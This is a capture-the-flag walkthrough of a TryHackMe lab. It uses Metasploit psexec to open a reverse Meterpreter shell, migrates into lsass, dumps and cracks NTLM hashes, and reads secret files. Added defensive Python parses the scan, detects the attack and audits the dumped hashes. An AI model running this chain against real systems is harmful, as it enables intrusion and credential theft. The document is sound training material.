This is a quick walkthrough for the challenge portion of the Meterpreter Post-Exploitation Challenge in TryHackMe.

What we know / scope

We have an IP address and some creds.

Discovery & Scanning

Let’s see what else we can find with a quick nmap scan:

sudo nmap -sV -vv 10.10.131.12
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 06:54 PDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 06:54
Scanning 10.10.131.12 [4 ports]
Completed Ping Scan at 06:54, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:54
Completed Parallel DNS resolution of 1 host. at 06:54, 0.00s elapsed
Initiating SYN Stealth Scan at 06:54
Scanning 10.10.131.12 [1000 ports]
Discovered open port 80/tcp on 10.10.131.12
Discovered open port 53/tcp on 10.10.131.12
Discovered open port 445/tcp on 10.10.131.12
Discovered open port 3389/tcp on 10.10.131.12
Discovered open port 139/tcp on 10.10.131.12
Discovered open port 135/tcp on 10.10.131.12
Discovered open port 88/tcp on 10.10.131.12
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 18.15% done; ETC: 06:55 (0:00:18 remaining)
Discovered open port 593/tcp on 10.10.131.12
Discovered open port 636/tcp on 10.10.131.12
Discovered open port 3268/tcp on 10.10.131.12
Discovered open port 3269/tcp on 10.10.131.12
Discovered open port 464/tcp on 10.10.131.12
Discovered open port 389/tcp on 10.10.131.12
Completed SYN Stealth Scan at 06:55, 8.23s elapsed (1000 total ports)
Initiating Service scan at 06:55
Scanning 13 services on 10.10.131.12
Completed Service scan at 06:55, 15.91s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.131.12.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:55
Completed NSE at 06:55, 0.76s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:55
Completed NSE at 06:55, 0.69s elapsed
Nmap scan report for 10.10.131.12
Host is up, received echo-reply ttl 125 (0.17s latency).
Scanned at 2021-10-28 06:54:52 PDT for 26s
Not shown: 987 filtered ports
Reason: 987 no-responses
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2021-10-28 13:55:09Z)
135/tcp  open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 125
464/tcp  open  kpasswd5?     syn-ack ttl 125
593/tcp  open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 125
3268/tcp open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 125
3389/tcp open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
Service Info: Host: ACME-TEST; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds
           Raw packets sent: 1994 (87.712KB) | Rcvd: 17 (732B)

Ports 135, 139 and 445 look very promising 🙂
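As an added example (not part of the original walkthrough), the Python below parses the nmap port table shown above and classifies the host by what it exposes. The role labels and the port signatures are my own; the input is the scan output from this page. On this scan it reports a domain controller for FLASH.local0. with SMB, RPC and RDP reachable from the scanning host, which is exactly the exposure the rest of the walkthrough relies on.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Sample input: the port table from the nmap run on this page (not constructed).
NMAP_OUTPUT = """\
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2021-10-28 13:55:09Z)
135/tcp  open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 125
464/tcp  open  kpasswd5?     syn-ack ttl 125
593/tcp  open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 125
3268/tcp open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 125
3389/tcp open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
"""

# One port line of nmap "normal" output. The REASON column ("syn-ack ttl 125")
# only appears with -v/-vv, so it is optional here.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?:syn-ack|reset|no-response|conn-refused)(?:\s+ttl\s+\d+)?)?"
    r"\s*(?P<version>.*)$"
)


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str
    version: str


def parse_open_ports(nmap_text: str) -> list[OpenPort]:
    """Return the open ports listed in nmap normal output, in file order."""
    found = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == "open":
            found.append(OpenPort(int(m.group("port")), m.group("proto"),
                                  m.group("service"), m.group("version").strip()))
    return found


# Port sets that, when all present, indicate a role. The labels are my own.
ROLE_SIGNATURES = {
    "domain-controller": {88, 389, 464},  # Kerberos, LDAP, kpasswd
    "global-catalog": {3268},             # GC LDAP (3269 is the TLS variant)
    "smb": {445},
    "rdp": {3389},
    "http": {80},
    "dns": {53},
}


def classify_host(open_ports: list[OpenPort]) -> list[str]:
    """Every role whose full port signature is open on TCP."""
    tcp = {p.port for p in open_ports if p.proto == "tcp"}
    return sorted(role for role, needed in ROLE_SIGNATURES.items() if needed <= tcp)


# nmap's LDAP probe prints "Domain: FLASH.local0., Site: ..." in the VERSION column.
AD_DOMAIN = re.compile(r"Domain:\s*([^,\s)]+)")


def extract_domain(open_ports: list[OpenPort]) -> str | None:
    for p in open_ports:
        m = AD_DOMAIN.search(p.version)
        if m:
            return m.group(1)
    return None


def exposure_summary(nmap_text: str) -> dict:
    """A compact finding a reviewer could paste into a report."""
    ports = parse_open_ports(nmap_text)
    tcp = {p.port for p in ports if p.proto == "tcp"}
    return {
        "open_tcp": sorted(tcp),
        "roles": classify_host(ports),
        "ad_domain": extract_domain(ports),
        # Remote-admin ports a DC should only expose to management networks.
        "remote_admin_exposed": sorted({135, 445, 3389} & tcp),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(exposure_summary(NMAP_OUTPUT), indent=2))
```

The regex keeps the REASON column optional, so the same parser works on a plain `nmap -sV` run; for anything beyond a one-off, parse `-oX` output with an XML parser instead of the human-readable table.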

Exploitation

Let’s try loading Metasploit with msfconsole and leveraging the exploit/windows/smb/psexec module:

msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Now we should look at our options:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ---- --------------- -------- -----------
   RHOSTS                                 yes       The target host(s), see https://github
                                                    .com/rapid7/metasploit-framework/wiki/
                                                    Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on t
                                                    arget for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authenti
                                                    cation
   SMBPass                                no        The password for the specified usernam
                                                    e
   SMBSHARE                               no        The share to connect to, can be an adm
                                                    in share (ADMIN$,C$,...) or a normal r
                                                    ead/write folder share
   SMBUser                                no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ---- --------------- -------- -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process
                                        , none)
   LHOST     x.x.x.x        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   -- ----
   0   Automatic

Now let’s go ahead and set LHOST, RHOSTS, SMBUser and SMBPass:

# LHOST is your host IP
msf6 exploit(windows/smb/psexec) > set LHOST 1.2.3.4
LHOST => 1.2.3.4
# RHOSTS is the target host(s)
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.131.12
RHOSTS => 10.10.131.12
msf6 exploit(windows/smb/psexec) > set SMBUSer given_user
SMBUSer => given_user
msf6 exploit(windows/smb/psexec) > set SMBPass given_password
SMBPass => given_password

Now let’s go ahead and run it with the exploit keyword:

msf6 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444 
[*] 10.10.131.12:445 - Connecting to the server...
[*] 10.10.131.12:445 - Authenticating to 10.10.131.12:445 as user 'ballen'...
[*] 10.10.131.12:445 - Selecting PowerShell target
[*] 10.10.131.12:445 - Executing the payload...
[+] 10.10.131.12:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.131.12
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 10.10.131.12:65160) at 2021-10-28 07:12:27 -0700

meterpreter >

Awesome, we are in! We now have a meterpreter session!

Post-Exploitation

System Information

Let’s gather some information about the system with the command sysinfo:

meterpreter > sysinfo
Computer        : ACME-TEST
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : FLASH
Logged On Users : 8
Meterpreter     : x86/windows

Let’s answer a couple of the questions:

Computer name: ACME-TEST

Target domain: FLASH

Share Enumeration

Let’s check what shares are available. First, background the session with CTRL+Z so we can leverage some of the other modules, then list the open sessions to see what our session number is, since we will need it shortly:

msf6 exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  -- ---- ---- ----------- ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ ACM  1.2.3.4:4444 -> 10.10
                                     E-TEST                     .131.12:65160 (10.10.131.1
                                                                2)

In the future we can go back to this session using sessions -i #.

Now let’s use the post/windows/gather/enum_shares module to gather information about the shares available:

msf6 exploit(windows/smb/psexec) > back
msf6 > use post/windows/gather/enum_shares
msf6 post(windows/gather/enum_shares) > show options

Module options (post/windows/gather/enum_shares):

   Name     Current Setting  Required  Description
   ---- --------------- -------- -----------
   CURRENT  true             yes       Enumerate currently configured shares
   ENTERED  true             yes       Enumerate Recently entered UNC Paths in the Run Dia
                                       log
   RECENT   true             yes       Enumerate Recently mapped shares
   SESSION                   yes       The session to run this module on.

We need to set the SESSION number. Let’s do that and run it:

msf6 post(windows/gather/enum_shares) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/enum_shares) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running against session 1
[*] The following shares were found:
[*]     Name: SYSVOL
[*] 
[*]     Name: NETLOGON
[*] 
[*]     Name: speedster
[*] 
[*] Post module execution completed

Answer Q: What is the name of the share likely created by the user?

speedster

Dump Hashes

Let’s get back to our meterpreter session:

msf6 post(windows/gather/enum_shares) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Our next step is to dump the hashes. First we need to migrate into the LSASS process, so let’s find it:

meterpreter > getpid
Current pid: 1524
meterpreter > ps

Process List
============

 PID   PPID  Name           Arch  Session  User                    Path
 --- ---- ---- ---- ------- ---- ----
 0     0     [System Proce
             ss]
 4     0     System         x64   0
 68    4     Registry       x64   0
 400   4     smss.exe       x64   0
 492   752   svchost.exe    x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\svc
                                                                   host.exe
 552   544   csrss.exe      x64   0
 624   616   csrss.exe      x64   1
 628   752   svchost.exe    x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\svc
                                                                   host.exe
 640   544   wininit.exe    x64   0
 688   616   winlogon.exe   x64   1        NT AUTHORITY\SYSTEM     C:\Windows\System32\win
                                                                   logon.exe
 752   640   services.exe   x64   0
 764   640   lsass.exe      x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\lsa
                                                                   ss.exe
 828   752   svchost.exe    x64   0        NT AUTHORITY\NETWORK S  C:\Windows\System32\svc
                                           ERVICE                  host.exe
 840   688   dwm.exe        x64   1        Window Manager\DWM-1    C:\Windows\System32\dwm
                                                                   .exe
 944   752   svchost.exe    x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\svc
                                                                   host.exe

Bingo, we found the lsass process with pid 764. Let’s migrate into that process so we can proceed with our next assignment:

meterpreter > migrate 764
[*] Migrating from 1524 to 764...
[*] Migration completed successfully.
meterpreter >
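On the defensive side, both of the steps above leave traces on the target: psexec installs a short-lived service (event ID 7045 in the System log; the "Selecting PowerShell target" line above means that service's command line is a PowerShell one-liner), and migrate creates a thread inside lsass.exe (Sysmon event ID 8, CreateRemoteThread). The Python below is an added example, not from the room or from Metasploit; the events are constructed, and the service name and command-line shape are assumptions about what such a service looks like rather than captured output.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample events (not real logs). Field names follow the System log
# "service was installed" event (ID 7045) and Sysmon CreateRemoteThread (ID 8).
# PIDs 1524 and 764 match the getpid/ps output on this page.
SAMPLE_EVENTS = [
    {"ts": "2021-10-28T07:12:20", "log": "System", "event_id": 7045,
     "ServiceName": "XvqLpRwkHeYzNtBa",  # constructed random-looking name
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
                  "-e JABzAD0AJAB0AA==",  # constructed encoded-command stub
     "AccountName": "LocalSystem"},
    {"ts": "2021-10-28T07:12:21", "log": "System", "event_id": 7045,
     "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
    {"ts": "2021-10-28T07:15:02", "log": "Microsoft-Windows-Sysmon/Operational",
     "event_id": 8, "SourceProcessId": 1524,
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetProcessId": 764, "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"ts": "2021-10-28T07:15:03", "log": "Microsoft-Windows-Sysmon/Operational",
     "event_id": 8, "SourceProcessId": 552,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetProcessId": 944, "TargetImage": r"C:\Windows\System32\svchost.exe"},
]


@dataclass(frozen=True)
class Alert:
    rule: str
    ts: str
    detail: str


ENCODED_CMD = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)
SHELL_HOST = re.compile(r"powershell|cmd\.exe|%COMSPEC%", re.I)
LSASS = re.compile(r"\\lsass\.exe$", re.I)


def looks_random(name: str) -> bool:
    """Heuristic only: long, all letters, many upper/lower flips ('XvqLpRwkHeYzNtBa')."""
    if len(name) < 8 or not name.isalpha():
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 4


def check_service_install(ev: dict) -> Alert | None:
    """7045: a new service whose binary is a shell with an encoded command, or a random name."""
    if ev.get("log") != "System" or ev.get("event_id") != 7045:
        return None
    path, name = ev.get("ImagePath", ""), ev.get("ServiceName", "")
    if SHELL_HOST.search(path) and ENCODED_CMD.search(path):
        return Alert("service-installs-encoded-shell", ev["ts"], f"{name}: {path[:60]}")
    if looks_random(name):
        return Alert("service-random-name", ev["ts"], name)
    return None


def check_lsass_thread(ev: dict) -> Alert | None:
    """Sysmon 8: any process creating a remote thread inside lsass.exe."""
    if ev.get("event_id") != 8 or "Sysmon" not in ev.get("log", ""):
        return None
    if LSASS.search(ev.get("TargetImage", "")):
        return Alert("remote-thread-into-lsass", ev["ts"],
                     f"{ev.get('SourceImage')} (pid {ev.get('SourceProcessId')}) "
                     f"-> lsass pid {ev.get('TargetProcessId')}")
    return None


def run_detections(events: list[dict]) -> list[Alert]:
    alerts = []
    for ev in events:
        for check in (check_service_install, check_lsass_thread):
            alert = check(ev)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"{a.ts} [{a.rule}] {a.detail}")
```

The two checks are independent on purpose: the service rule fires on the lateral-movement step even if Sysmon is not deployed, and the lsass rule fires on the credential-access step even if the attacker used something other than psexec to get in. Both events also carry enough context (source PID, image path, timestamp) to pivot back to the 4624 network logon that preceded them.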

Now from the lsass process we should be able to dump the hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:5164d49b0ced05d3249842f7e420590e:::

Now, we could attempt to crack the hash ourselves using something like John the Ripper or hashcat, or we could leverage something like Crackstation.net. I chose the latter, and what do you know:

Hash                              Type  Result
69596c7aa1e8daee17f8e78870e25a5c  NTLM  Trustno1

That answers that question!
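As an added example that is not part of the walkthrough, the script below parses the pwdump-style hashdump lines above (user:RID:LM hash:NT hash:::) and audits them the way a defender reviewing such a dump would: blank NT hashes, LM hashes still being stored, a renamed RID-500 account, krbtgt exposure, and password reuse across accounts. The two svc_* lines and their shared hash are constructed to exercise the reuse check; everything else is the output from this page.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Sample input: the hashdump output from this page, plus two constructed lines
# (svc_backup / svc_web, with a made-up shared hash) to show reuse detection.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:5164d49b0ced05d3249842f7e420590e:::
svc_backup:1200:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_web:1201:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


@dataclass(frozen=True)
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        # Computer accounts end in "$" and have random, regularly rotated passwords.
        return self.user.endswith("$")


def parse_hashdump(text: str) -> list[Account]:
    """Parse pwdump-style lines and validate the hash fields."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length in: {line!r}")
        accounts.append(Account(user, rid, lm, nt))
    return accounts


def audit(accounts: list[Account]) -> list[tuple[str, str]]:
    """Return (who, finding) pairs a defender would act on after a dump like this."""
    findings = []
    by_nt: dict[str, list[str]] = defaultdict(list)
    for a in accounts:
        if a.nt == EMPTY_NT:
            # A blank password; the dump does not say whether the account is disabled.
            findings.append((a.user, "empty password (NT hash of '')"))
        if a.lm != EMPTY_LM:
            findings.append((a.user, "LM hash stored: legacy hashing still enabled"))
        if a.rid == 500 and a.user != "Administrator":
            findings.append((a.user, "built-in Administrator (RID 500) has been renamed"))
        if a.user.lower() == "krbtgt":
            findings.append((a.user, "krbtgt hash exposed: reset the krbtgt password twice"))
        if not a.is_machine:
            by_nt[a.nt].append(a.user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((",".join(users), "same NT hash: password reuse across accounts"))
    return findings


if __name__ == "__main__":
    for who, what in audit(parse_hashdump(HASHDUMP)):
        print(f"{who:24} {what}")
```

The reuse check compares NT hashes directly because NT hashes are unsalted: two accounts with the same password always produce the same hash, which is also why a single cracked hash (like the one looked up on Crackstation above) can unlock more than one account.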

secrets.txt file

Now we have to answer two related questions about a secrets.txt file.

Let’s find it leveraging the meterpreter’s search feature:

meterpreter > search -f secrets.txt
Found 1 result...
    c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt (35 bytes)

Now that we have found the path, we can answer the question about the file’s location.

Next, let’s read the contents of the file:

meterpreter > cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
My Twitter password is KDSvbsw3849!

realsecret.txt file

The last two questions concern a realsecret.txt file. We use the same technique as above to find and read it:

meterpreter > search -f realsecret.txt
Found 1 result...
    c:\inetpub\wwwroot\realsecret.txt (34 bytes)
meterpreter > cat "c:\inetpub\wwwroot\realsecret.txt"
The Flash is the fastest man alive

RECAP

We were able to leverage the given creds and the IP address to create a meterpreter session. From there we gathered information about the system, dumped hashes that could be leveraged for further activity such as lateral movement, and accessed data that could be used later in the process or exfiltrated.